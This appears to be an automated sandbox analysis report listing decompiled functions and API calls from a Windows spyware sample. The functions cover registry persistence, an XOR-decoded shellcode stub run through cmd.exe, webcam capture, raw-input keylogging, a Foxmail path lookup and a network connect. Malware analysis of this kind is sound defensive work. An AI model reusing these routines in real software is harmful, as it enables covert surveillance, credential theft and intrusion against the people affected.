                                      				_t16 = L"SOFTWARE\\_rptls";
                                      				if(RegOpenKeyExW(0x80000001, _t16, 0, 0xf003f,  &_v8) != 0) {
                                      					RegCreateKeyExW(0x80000001, _t16, 0, 0, 0, 0xf003f, 0,  &_v8,  &_v12);
                                      				}
                                      				RegSetValueExW(_v8, L"Install", 0, 1, 0x4168c0, lstrlenW(0x4168c0) << 2);
                                      				return RegCloseKey(_v8);
                                      			}






                                      0x0040f200
                                      0x0040f214
                                      0x0040f229
                                      0x0040f229
                                      0x0040f24b
                                      0x0040f25e

                                      APIs
                                      • RegOpenKeyExW.ADVAPI32 ref: 0040F20C
                                      • RegCreateKeyExW.ADVAPI32(80000001,SOFTWARE\_rptls,00000000,00000000,00000000,000F003F,00000000,?,?), ref: 0040F229
                                      • lstrlenW.KERNEL32(004168C0,?,?,?,0040F291,?,?,00405268,?,?,000000FE,?,000000FE,?,00000000), ref: 0040F235
                                      • RegSetValueExW.ADVAPI32 ref: 0040F24B
                                      • RegCloseKey.ADVAPI32(?), ref: 0040F254
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1181598002.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_efwhixxln.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseCreateOpenValuelstrlen
                                      • String ID: Install$SOFTWARE\_rptls
                                      • API String ID: 2036214137-3226779556
                                      • Opcode ID: 0ddf7a4f710da00c4fb83adf41258a61bdaa5fa94982a9deb14dfa4387708b59
                                      • Instruction ID: 34e325bec679b2a6ac2b72ecd605b8b4e35f20e9be9a6099366f3d433d2abdbc
                                      • Opcode Fuzzy Hash: 0ddf7a4f710da00c4fb83adf41258a61bdaa5fa94982a9deb14dfa4387708b59
                                      • Instruction Fuzzy Hash: E3F0AF71600018BFE7215B86DD4DEEB7F7CEBCA790B00417ABA05E1011D7A15F54C6B8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 86%
                                      			E0040F25F(void* __ecx, void* __eflags) {
                                      				long _t2;
                                      				void* _t6;
                                      				void* _t11;
                                      				struct HRSRC__* _t14;
                                      
                                      				_t11 = __ecx;
                                      				E00401052(0x4168c0, 0, 0x208);
                                      				_t2 = GetModuleFileNameW(0, 0x4168c0, 0x208);
                                      				__imp__#680();
                                      				if(_t2 == 0) {
                                      					E0040F1EC(_t11);
                                      					_t14 = FindResourceW(0, 0x66, L"WM_DSP");
                                      					_t6 = LoadResource(0, _t14);
                                      					SizeofResource(0, _t14);
                                      					E0040F159(LockResource(_t6));
                                      				}
                                      				return 0;
                                      			}







                                      0x0040f25f
                                      0x0040f271
                                      0x0040f27c
                                      0x0040f282
                                      0x0040f28a
                                      0x0040f28c
                                      0x0040f29f
                                      0x0040f2a3
                                      0x0040f2ad
                                      0x0040f2bc
                                      0x0040f2bc
                                      0x0040f2c6

                                      APIs
                                      • GetModuleFileNameW.KERNEL32(00000000,004168C0,00000208,000000FE,?,?,?,?,00405268,?,?,000000FE,?,000000FE,?,00000000), ref: 0040F27C
                                      • IsUserAnAdmin.SHELL32 ref: 0040F282
                                        • Part of subcall function 0040F1EC: RegOpenKeyExW.ADVAPI32 ref: 0040F20C
                                        • Part of subcall function 0040F1EC: RegCreateKeyExW.ADVAPI32(80000001,SOFTWARE\_rptls,00000000,00000000,00000000,000F003F,00000000,?,?), ref: 0040F229
                                        • Part of subcall function 0040F1EC: lstrlenW.KERNEL32(004168C0,?,?,?,0040F291,?,?,00405268,?,?,000000FE,?,000000FE,?,00000000), ref: 0040F235
                                        • Part of subcall function 0040F1EC: RegSetValueExW.ADVAPI32 ref: 0040F24B
                                        • Part of subcall function 0040F1EC: RegCloseKey.ADVAPI32(?), ref: 0040F254
                                      • FindResourceW.KERNEL32(00000000,00000066,WM_DSP,?,?,00405268,?,?,000000FE,?,000000FE,?,00000000,?,?,00000000), ref: 0040F299
                                      • LoadResource.KERNEL32(00000000,00000000,?,?,00405268,?,?,000000FE,?,000000FE,?,00000000,?,?,00000000), ref: 0040F2A3
                                      • SizeofResource.KERNEL32(00000000,00000000,?,?,00405268,?,?,000000FE,?,000000FE,?,00000000,?,?,00000000), ref: 0040F2AD
                                      • LockResource.KERNEL32(00000000,?,?,00405268,?,?,000000FE,?,000000FE,?,00000000,?,?,00000000), ref: 0040F2B4
                                        • Part of subcall function 0040F159: VirtualProtect.KERNEL32(00000000,000007D0,00000040,00000000,00000000,00000000,00000000,00000000,?,0040F2C1,?,?,00405268,?,?,000000FE), ref: 0040F197
                                        • Part of subcall function 0040F159: VirtualAlloc.KERNEL32(00000000,000001FE,00001000,00000040,?,0040F2C1,?,?,00405268,?,?,000000FE,?,000000FE,?,00000000), ref: 0040F1AB
                                        • Part of subcall function 0040F159: GetWindowsDirectoryW.KERNEL32(00000000,00000104,?,0040F2C1,?,?,00405268,?,?,000000FE,?,000000FE,?,00000000), ref: 0040F1B9
                                        • Part of subcall function 0040F159: lstrlenW.KERNEL32(00000000,\System32\cmd.exe,00000028,?,0040F2C1,?,?,00405268,?,?,000000FE,?,000000FE,?,00000000), ref: 0040F1C7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1181598002.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_efwhixxln.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Resource$Virtuallstrlen$AdminAllocCloseCreateDirectoryFileFindLoadLockModuleNameOpenProtectSizeofUserValueWindows
                                      • String ID: WM_DSP
                                      • API String ID: 2384039076-506093727
                                      • Opcode ID: 8852693b62ad9acbd12ae839921cef76b17fafc36f55b62f720ebef59d03c0a2
                                      • Instruction ID: d24d02549f6e3768f6ca935ec8fa963fb89bf1d940adbb3100ed89617e633398
                                      • Opcode Fuzzy Hash: 8852693b62ad9acbd12ae839921cef76b17fafc36f55b62f720ebef59d03c0a2
                                      • Instruction Fuzzy Hash: BEF08271600250BBD3203B72AD8DD9B2FACEFC6755715403AF606E2192DAB88D1586BD
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 68%
                                      			E004056F9(void* __ecx) {
                                      				_Unknown_base(*)()* _t2;
                                      				void* _t4;
                                      
                                      				_t4 = __ecx;
                                      				_t2 = GetProcAddress(LoadLibraryA("USER32.DLL"), "MessageBoxA");
                                      				if(_t4 == 0) {
                                      					if(_t2 != 0) {
                                      						_t2 =  *_t2(0, "An assertion condition failed", "Assert", 0x2010);
                                      					}
                                      					ExitProcess(1);
                                      				}
                                      				return _t2;
                                      			}





                                      0x004056ff
                                      0x0040570d
                                      0x00405716
                                      0x0040571a
                                      0x0040572d
                                      0x0040572d
                                      0x00405731
                                      0x00405731
                                      0x00405737

                                      APIs
                                      • LoadLibraryA.KERNEL32(USER32.DLL), ref: 00405701
                                      • GetProcAddress.KERNEL32(00000000,MessageBoxA,?,00000000,?,?,?,?,?,?,?,004054EA,?,00000000,.bss,00000000), ref: 0040570D
                                      • ExitProcess.KERNEL32 ref: 00405731
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1181598002.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_efwhixxln.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressExitLibraryLoadProcProcess
                                      • String ID: An assertion condition failed$Assert$MessageBoxA$USER32.DLL
                                      • API String ID: 881411216-1361702557
                                      • Opcode ID: 6985b899cce19f37c5b650aa7753ead7e8c59fc871d0999e705d66fd0f28a6e7
                                      • Instruction ID: 277339b69ed5042fd311e9be13e92df597cf412fc845d55b725ba16bf364ea8c
                                      • Opcode Fuzzy Hash: 6985b899cce19f37c5b650aa7753ead7e8c59fc871d0999e705d66fd0f28a6e7
                                      • Instruction Fuzzy Hash: 23D017707C1301BAEA102B706F0ABD72A14AB18B51F204022BA85E61D1C5E984A5CA2C
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 68%
                                      			E004059C0() {
                                      				_Unknown_base(*)()* _t2;
                                      
                                      				_t2 = GetProcAddress(LoadLibraryA("USER32.DLL"), "MessageBoxA");
                                      				if(_t2 != 0) {
                                      					 *_t2(0, "A pure virtual function was called. This is a fatal error, and indicates a serious error in the implementation of the application", "PureCall", 0x2010);
                                      				}
                                      				ExitProcess(1);
                                      			}




                                      0x004059d1
                                      0x004059d9
                                      0x004059ec
                                      0x004059ec
                                      0x004059f0

                                      APIs
                                      • LoadLibraryA.KERNEL32(USER32.DLL), ref: 004059C5
                                      • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 004059D1
                                      • ExitProcess.KERNEL32 ref: 004059F0
                                      Strings
                                      • USER32.DLL, xrefs: 004059C0
                                      • MessageBoxA, xrefs: 004059CB
                                      • A pure virtual function was called. This is a fatal error, and indicates a serious error in the implementation of the application, xrefs: 004059E5
                                      • PureCall, xrefs: 004059E0
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1181598002.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_efwhixxln.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressExitLibraryLoadProcProcess
                                      • String ID: A pure virtual function was called. This is a fatal error, and indicates a serious error in the implementation of the application$MessageBoxA$PureCall$USER32.DLL
                                      • API String ID: 881411216-4134947204
                                      • Opcode ID: 3883ed54bfb8ba8a998150d75b30605c68fa973c0d456d4eaed15fd6d135e0bf
                                      • Instruction ID: e785614744312d4ea1c5ae80ca4ca9c17c7cc8424604ff6d730008a59afba7fd
                                      • Opcode Fuzzy Hash: 3883ed54bfb8ba8a998150d75b30605c68fa973c0d456d4eaed15fd6d135e0bf
                                      • Instruction Fuzzy Hash: 98D0E9707C0301BBE6506BB16F0FFD72A15AB08F11F214522F695E41D2C9E994F18A3D
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 53%
                                      			E0041041F(signed int __ecx, signed int _a4) {
                                      				intOrPtr _v38;
                                      				intOrPtr _v44;
                                      				intOrPtr _v48;
                                      				void* _v112;
                                      				char _v128;
                                      				intOrPtr _v132;
                                      				char _v200;
                                      				intOrPtr _t49;
                                      				intOrPtr* _t54;
                                      				intOrPtr* _t58;
                                      				intOrPtr* _t60;
                                      				intOrPtr* _t71;
                                      				signed int _t76;
                                      				intOrPtr* _t78;
                                      				intOrPtr* _t79;
                                      				intOrPtr* _t80;
                                      				intOrPtr* _t85;
                                      				signed int _t91;
                                      				intOrPtr* _t96;
                                      				intOrPtr* _t97;
                                      				intOrPtr* _t104;
                                      				signed int _t107;
                                      				intOrPtr* _t111;
                                      				intOrPtr* _t112;
                                      				intOrPtr* _t113;
                                      				intOrPtr* _t118;
                                      				void* _t119;
                                      				void* _t120;
                                      				void* _t121;
                                      
                                      				_t76 = __ecx;
                                      				__imp__CoInitialize(0);
                                      				_t1 = _t76 + 0x18; // 0x5d5340
                                      				_t111 = _t1;
                                      				__imp__CoCreateInstance(0x412380, 0, 1, 0x414694, _t111);
                                      				_t78 =  *_t111;
                                      				if(_t78 != 0) {
                                      					_t2 = _t76 + 0x1c; // 0x5d5344
                                      					_t104 = _t2;
                                      					_t49 =  *((intOrPtr*)( *_t78))(_t78, 0x412360, _t104);
                                      					_t79 =  *_t104;
                                      					if(_t79 != 0) {
                                      						_t49 =  *((intOrPtr*)( *_t79 + 4))(_t79);
                                      						_t4 = _t76 + 0x20; // 0x5d5348
                                      						_t112 = _t4;
                                      						if(_t112 != 0) {
                                      							_t49 = E00410180(_a4, _t112);
                                      						}
                                      						if( *_t112 != 0) {
                                      							_t6 = _t76 + 0x24; // 0x5d534c
                                      							_t113 = _t6;
                                      							__imp__CoCreateInstance(0x4123d0, 0, 1, 0x414684, _t113);
                                      							_t80 =  *_t113;
                                      							if(_t80 != 0) {
                                      								 *((intOrPtr*)( *_t80 + 0xc))(_t80,  *((intOrPtr*)(_t76 + 0x20)), L"Source");
                                      								_t54 =  *_t113;
                                      								 *((intOrPtr*)( *_t54 + 0xc))(_t54,  *_t104, L"Grabber");
                                      								E00401052( &_v128, 0, 0x48);
                                      								_t58 =  *((intOrPtr*)(_t76 + 0x18));
                                      								_t121 = _t120 + 0xc;
                                      								asm("movsd");
                                      								asm("movsd");
                                      								asm("movsd");
                                      								asm("movsd");
                                      								asm("movsd");
                                      								asm("movsd");
                                      								asm("movsd");
                                      								asm("movsd");
                                      								 *((intOrPtr*)( *_t58 + 0x10))(_t58,  &_v128);
                                      								_t49 = E0040FD9D();
                                      								 *((intOrPtr*)(_t76 + 0x28)) = _t49;
                                      								if(_t49 != 0) {
                                      									_t49 = E0040FDB9();
                                      									 *((intOrPtr*)(_t76 + 0x2c)) = _t49;
                                      									if(_t49 != 0) {
                                      										_t85 =  *((intOrPtr*)(_t76 + 0x24));
                                      										_t49 =  *((intOrPtr*)( *_t85 + 0x2c))(_t85,  *((intOrPtr*)(_t76 + 0x28)), _t49);
                                      										if(_t49 >= 0) {
                                      											_t60 =  *((intOrPtr*)(_t76 + 0x18));
                                      											 *((intOrPtr*)( *_t60 + 0x14))(_t60,  &_v200);
                                      											E0040102C(_t119 + _v132 + 0x30 - _v132 - 0x60, _v132 + 0x30, 0x28);
                                      											E0040FC00( &_v200);
                                      											_t107 = _a4;
                                      											E0041023F(_t76, _v132 + 0x30, _t107, _v44, _v48, _v38);
                                      											E004056F9(_t76 & 0xffffff00 | _t107 -  *((intOrPtr*)(_t76 + 0xc)) > 0x00000000);
                                      											_t91 = 7;
                                      											memcpy(_t121 + 0xc - 0x1c,  *( *((intOrPtr*)(_t76 + 4)) + _t107 * 4), _t91 << 2);
                                      											E0040FCED( *_t76);
                                      											_t49 = E0040FD9D();
                                      											 *((intOrPtr*)(_t76 + 0x30)) = _t49;
                                      											if(_t49 != 0) {
                                      												_t71 =  *((intOrPtr*)(_t76 + 0x18));
                                      												 *((intOrPtr*)( *_t71 + 0x24))(_t71,  *_t76, 0);
                                      												_t96 =  *((intOrPtr*)(_t76 + 0x24));
                                      												_t47 = _t76 + 0x34; // 0x5d535c
                                      												_t118 = _t47;
                                      												_t49 =  *((intOrPtr*)( *_t96))(_t96, 0x4123a0, _t118);
                                      												_t97 =  *_t118;
                                      												if(_t97 != 0) {
                                      													return  *((intOrPtr*)( *_t97 + 0x1c))(_t97);
                                      												}
                                      											}
                                      										}
                                      									}
                                      								}
                                      							}
                                      						}
                                      					}
                                      				}
                                      				return _t49;
                                      			}
































                                      0x0041042d
                                      0x0041042f
                                      0x00410435
                                      0x00410435
                                      0x00410447
                                      0x0041044d
                                      0x00410451
                                      0x00410459
                                      0x00410459
                                      0x00410463
                                      0x00410465
                                      0x00410469
                                      0x00410472
                                      0x00410475
                                      0x00410475
                                      0x0041047a
                                      0x00410481
                                      0x00410481
                                      0x00410489
                                      0x0041048f
                                      0x0041048f
                                      0x004104a1
                                      0x004104a7
                                      0x004104ab
                                      0x004104bc
                                      0x004104bf
                                      0x004104cb
                                      0x004104d6
                                      0x004104e0
                                      0x004104e6
                                      0x004104ec
                                      0x004104ef
                                      0x004104f0
                                      0x004104f1
                                      0x004104fa
                                      0x004104fb
                                      0x004104fc
                                      0x004104fd
                                      0x00410500
                                      0x00410506
                                      0x0041050b
                                      0x00410510
                                      0x00410519
                                      0x0041051e
                                      0x00410523
                                      0x00410529
                                      0x00410533
                                      0x00410538
                                      0x0041053e
                                      0x0041054b
                                      0x00410560
                                      0x0041056e
                                      0x00410576
                                      0x00410582
                                      0x0041058d
                                      0x0041059d
                                      0x004105a0
                                      0x004105a4
                                      0x004105ac
                                      0x004105b1
                                      0x004105b6
                                      0x004105b8
                                      0x004105c2
                                      0x004105c5
                                      0x004105c8
                                      0x004105c8
                                      0x004105d4
                                      0x004105d6
                                      0x004105da
                                      0x00000000
                                      0x004105df
                                      0x004105da
                                      0x004105b6
                                      0x00410538
                                      0x00410523
                                      0x00410510
                                      0x004104ab
                                      0x00410489
                                      0x00410469
                                      0x004105e6

                                      APIs
                                      • CoInitialize.OLE32(00000000), ref: 0041042F
                                      • CoCreateInstance.OLE32(00412380,00000000,00000001,00414694,005D5340), ref: 00410447
                                      • CoCreateInstance.OLE32(004123D0,00000000,00000001,00414684,005D534C), ref: 004104A1
                                        • Part of subcall function 00410180: CoCreateInstance.OLE32(004123C0,00000000,00000001,00414674,?), ref: 004101AE
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1181598002.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_efwhixxln.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CreateInstance$Initialize
                                      • String ID: Grabber$Source$vids
                                      • API String ID: 1108742289-4200688928
                                      • Opcode ID: ac87db7589f56d9aab403b51af22a28c7a477f1b998d940f220e485e409256cf
                                      • Instruction ID: d5dccdf25cec60d4b88a9396671c5f6553ca50177c3e8da00cbb81949e063f79
                                      • Opcode Fuzzy Hash: ac87db7589f56d9aab403b51af22a28c7a477f1b998d940f220e485e409256cf
                                      • Instruction Fuzzy Hash: 1B518F71600204AFCB24DF64C885F9A7766BF49704B20446DFD46EF296CBB9E885CF98
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 79%
                                      			E004084CF() {
                                      				intOrPtr _t1;
                                      
                                      				_t1 = 5;
                                      				 *0x4177bc = _t1;
                                      				 *0x416da4 = 0;
                                      				 *0x4177b4 = _t1;
                                      				 *0x4177b8 = 0;
                                      				E00401815(0x4177b0, 0);
                                      				InitializeCriticalSection(0x4177c0);
                                      				E0040D9F6(0x4177ec, 0);
                                      				asm("xorps xmm0, xmm0");
                                      				 *0x4177d8 = 0;
                                      				asm("movups [0x417804], xmm0");
                                      				 *0x4177e8 = 0;
                                      				_t19 = LoadLibraryW(L"User32.dll");
                                      				_push(0x4177ec);
                                      				 *0x4177dc = E0040E579(_t4, "GetRawInputData", 0);
                                      				 *0x4177e4 = E0040E579(_t19, "ToUnicode", 0);
                                      				 *0x4177e0 = E0040E579(_t19, "MapVirtualKeyA", 0);
                                      				return 0x416d98;
                                      			}




                                      0x004084d2
                                      0x004084d5
                                      0x004084df
                                      0x004084e5
                                      0x004084ea
                                      0x004084f0
                                      0x004084fa
                                      0x00408505
                                      0x0040850a
                                      0x0040850d
                                      0x00408518
                                      0x0040851f
                                      0x0040852b
                                      0x00408532
                                      0x0040853f
                                      0x00408550
                                      0x0040855d
                                      0x00408568

                                      APIs
                                      • InitializeCriticalSection.KERNEL32(004177C0,?,004011C1), ref: 004084FA
                                      • LoadLibraryW.KERNEL32(User32.dll,?,004011C1), ref: 00408525
                                        • Part of subcall function 0040E579: lstrcmpA.KERNEL32(?,?,?,0040A3BD,?,?,00000104,00000000), ref: 0040E5B2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1181598002.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_efwhixxln.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CriticalInitializeLibraryLoadSectionlstrcmp
                                      • String ID: GetRawInputData$MapVirtualKeyA$ToUnicode$User32.dll
                                      • API String ID: 4274177235-2474467583
                                      • Opcode ID: 17124eb63e3461480bb0d44547ee27731a4563c76d7358d62431a8cef5d3268b
                                      • Instruction ID: 15080acfafdc455afec958be52a15e4654f54f2d8ff3b00303750730c01a7f86
                                      • Opcode Fuzzy Hash: 17124eb63e3461480bb0d44547ee27731a4563c76d7358d62431a8cef5d3268b
                                      • Instruction Fuzzy Hash: C9014B71A482108BC345EF6ABD152CA3AB1E789B04B11C13FF028D73E5DB7829D18B9D
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 73%
                                      			E0040F159(void* __ecx) {
                                      				long _v8;
                                      				void* _t7;
                                      				void* _t17;
                                      				void* _t24;
                                      				void* _t26;
                                      				WCHAR* _t31;
                                      
                                      				_push(__ecx);
                                      				_t17 = __ecx;
                                      				_t26 = E004010AD(0x800);
                                      				_t24 = _t26;
                                      				_t7 = 0x601;
                                      				do {
                                      					 *_t24 =  *(0x413bf0 + _t24) ^ 0x00000045;
                                      					_t24 = _t24 + 1;
                                      					_t7 = _t7 - 1;
                                      				} while (_t7 != 0);
                                      				VirtualProtect(_t26, 0x7d0, 0x40,  &_v8);
                                      				_t31 = VirtualAlloc(0, 0x1fe, 0x1000, 0x40);
                                      				GetWindowsDirectoryW(_t31, 0x104);
                                      				E0040102C( &(_t31[lstrlenW(_t31)]), L"\\System32\\cmd.exe", 0x28);
                                      				_t5 = _t26 + 0xef; // 0xef
                                      				return  *_t5(_t31, _t17, 0, 0);
                                      			}









                                      0x0040f15c
                                      0x0040f165
                                      0x0040f16c
                                      0x0040f174
                                      0x0040f178
                                      0x0040f17d
                                      0x0040f183
                                      0x0040f185
                                      0x0040f186
                                      0x0040f186
                                      0x0040f197
                                      0x0040f1b1
                                      0x0040f1b9
                                      0x0040f1d1
                                      0x0040f1d9
                                      0x0040f1eb

                                      APIs
                                        • Part of subcall function 004010AD: GetProcessHeap.KERNEL32(00000000,00000000,0040F16C,00000800,00000000,00000000,00000000,00000000,?,0040F2C1,?,?,00405268,?,?,000000FE), ref: 004010B3
                                        • Part of subcall function 004010AD: RtlAllocateHeap.NTDLL(00000000,?,0040F2C1,?,?,00405268,?,?,000000FE,?,000000FE,?,00000000,?,?,00000000), ref: 004010BA
                                      • VirtualProtect.KERNEL32(00000000,000007D0,00000040,00000000,00000000,00000000,00000000,00000000,?,0040F2C1,?,?,00405268,?,?,000000FE), ref: 0040F197
                                      • VirtualAlloc.KERNEL32(00000000,000001FE,00001000,00000040,?,0040F2C1,?,?,00405268,?,?,000000FE,?,000000FE,?,00000000), ref: 0040F1AB
                                      • GetWindowsDirectoryW.KERNEL32(00000000,00000104,?,0040F2C1,?,?,00405268,?,?,000000FE,?,000000FE,?,00000000), ref: 0040F1B9
                                      • lstrlenW.KERNEL32(00000000,\System32\cmd.exe,00000028,?,0040F2C1,?,?,00405268,?,?,000000FE,?,000000FE,?,00000000), ref: 0040F1C7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1181598002.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_efwhixxln.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: HeapVirtual$AllocAllocateDirectoryProcessProtectWindowslstrlen
                                      • String ID: \System32\cmd.exe
                                      • API String ID: 2244922440-2003734499
                                      • Opcode ID: b10fa8982d0daea790bfb56a87a95910784583b089608f3096d0dec34b6f7431
                                      • Instruction ID: 0f9499e4239ff946359cd4da6febedf0c1d36d2bf284e6b78ffe54fdf8d70e34
                                      • Opcode Fuzzy Hash: b10fa8982d0daea790bfb56a87a95910784583b089608f3096d0dec34b6f7431
                                      • Instruction Fuzzy Hash: E30124717802117BE22157A59D46FAB3B9CCB89B41F004036F305FA1C1C9E9A90087AC
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E004088BB(void* __ecx) {
                                      				int _v8;
                                      				void* _v12;
                                      				void* _t7;
                                      
                                      				if(RegOpenKeyExA(0x80000001, "software\\Aerofox\\FoxmailPreview", 0, 0x20019,  &_v12) != 0) {
                                      					L3:
                                      					_t7 = 0;
                                      				} else {
                                      					_v8 = 0x104;
                                      					if(RegQueryValueExA(_v12, "Executable", 0, 0, 0x4167b8,  &_v8) != 0) {
                                      						goto L3;
                                      					} else {
                                      						PathRemoveFileSpecA(0x4167b8);
                                      						_t7 = 1;
                                      					}
                                      				}
                                      				return _t7;
                                      			}






                                      0x004088de
                                      0x00408912
                                      0x00408912
                                      0x004088e0
                                      0x004088e3
                                      0x00408905
                                      0x00000000
                                      0x00408907
                                      0x00408908
                                      0x0040890e
                                      0x0040890e
                                      0x00408905
                                      0x00408916

                                      APIs
                                      • RegOpenKeyExA.ADVAPI32(80000001,software\Aerofox\FoxmailPreview,00000000,00020019,?), ref: 004088D6
                                      • RegQueryValueExA.ADVAPI32 ref: 004088FD
                                      • PathRemoveFileSpecA.SHLWAPI(004167B8), ref: 00408908
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1181598002.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_efwhixxln.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: FileOpenPathQueryRemoveSpecValue
                                      • String ID: Executable$software\Aerofox\FoxmailPreview
                                      • API String ID: 3687894118-2371247776
                                      • Opcode ID: c56086577de6cb68103ad096c498ee7b38cda4bedee5f54508016ccb2ee7c8b3
                                      • Instruction ID: 99faddbd660e9f92ff0d39bde148903884fb3c643bb86008af766538127eb9d9
                                      • Opcode Fuzzy Hash: c56086577de6cb68103ad096c498ee7b38cda4bedee5f54508016ccb2ee7c8b3
                                      • Instruction Fuzzy Hash: CFF0A7B4240204BAEF10AB50DD46FEF3BAC9745B04F10416AB501F21D2D7F49B41E52D
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • WSAStartup.WS2_32(00000202,?), ref: 0040D122
                                      • socket.WS2_32(00000002,00000001,00000000), ref: 0040D133
                                      • gethostbyname.WS2_32(?), ref: 0040D141
                                      • htons.WS2_32(?), ref: 0040D167
                                      • connect.WS2_32(00000000,?,00000010), ref: 0040D17A
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1181598002.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_efwhixxln.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Startupconnectgethostbynamehtonssocket
                                      • String ID:
                                      • API String ID: 2405761414-0
                                      • Opcode ID: 29bafcd25dc25a381aa7b92104a4ff7c39bde2dd6ab1b6b01bf3cfe734db5acd
                                      • Instruction ID: 61c4d67538dccba4f4b88579259b8d97a44ccd2e8883c1dd59be44d551050d24
                                      • Opcode Fuzzy Hash: 29bafcd25dc25a381aa7b92104a4ff7c39bde2dd6ab1b6b01bf3cfe734db5acd
                                      • Instruction Fuzzy Hash: F301D6717003056BD310DBB5AC49EABB7ACEF44721F00463BFD54D71E1E6B48919839A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 93%
                                      			E0040E764(signed int* __ecx, void* __edx) {
                                      				char _v524;
                                      				intOrPtr _v552;
                                      				void* _v560;
                                      				int _t9;
                                      				void* _t15;
                                      				void* _t19;
                                      				signed int* _t20;
                                      
                                      				_t15 = __edx;
                                      				_v560 = 0x22c;
                                      				_t20 = __ecx;
                                      				_t19 = CreateToolhelp32Snapshot(2, 0);
                                      				if(_t19 == 0xffffffff) {
                                      					L6:
                                      					 *_t20 =  *_t20 & 0x00000000;
                                      				} else {
                                      					_push( &_v560);
                                      					_t9 = Process32FirstW(_t19);
                                      					while(_t9 != 0) {
                                      						if(_v552 == _t15) {
                                      							CloseHandle(_t19);
                                      							E004033AB(_t20,  &_v524);
                                      						} else {
                                      							_t9 = Process32NextW(_t19,  &_v560);
                                      							continue;
                                      						}
                                      						goto L7;
                                      					}
                                      					CloseHandle(_t19);
                                      					goto L6;
                                      				}
                                      				L7:
                                      				return _t20;
                                      			}










                                      0x0040e774
                                      0x0040e776
                                      0x0040e780
                                      0x0040e788
                                      0x0040e78d
                                      0x0040e7c0
                                      0x0040e7c0
                                      0x0040e78f
                                      0x0040e795
                                      0x0040e797
                                      0x0040e7b5
                                      0x0040e7a5
                                      0x0040e7cb
                                      0x0040e7da
                                      0x0040e7a7
                                      0x0040e7af
                                      0x00000000
                                      0x0040e7af
                                      0x00000000
                                      0x0040e7a5
                                      0x0040e7ba
                                      0x00000000
                                      0x0040e7ba
                                      0x0040e7c4
                                      0x0040e7c9

                                      APIs
                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040E782
                                      • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040E797
                                      • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E7AF
                                      • CloseHandle.KERNEL32(00000000), ref: 0040E7BA
                                      • CloseHandle.KERNEL32(00000000), ref: 0040E7CB
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1181598002.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_efwhixxln.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseHandleProcess32$CreateFirstNextSnapshotToolhelp32
                                      • String ID:
                                      • API String ID: 1789362936-0
                                      • Opcode ID: 15901066c97be2484c5650acb9a592a2fdc96c9d25de0ac2de4f395fe8e59fe2
                                      • Instruction ID: c5b5f033920b13882c0739d2e3bae2d1bc0c642545de4a6447579076702dad48
                                      • Opcode Fuzzy Hash: 15901066c97be2484c5650acb9a592a2fdc96c9d25de0ac2de4f395fe8e59fe2
                                      • Instruction Fuzzy Hash: 65018631600214BBD7249BB6AD4CBBFBABCDB45721F10447AE605E31D0DBB88D518A59
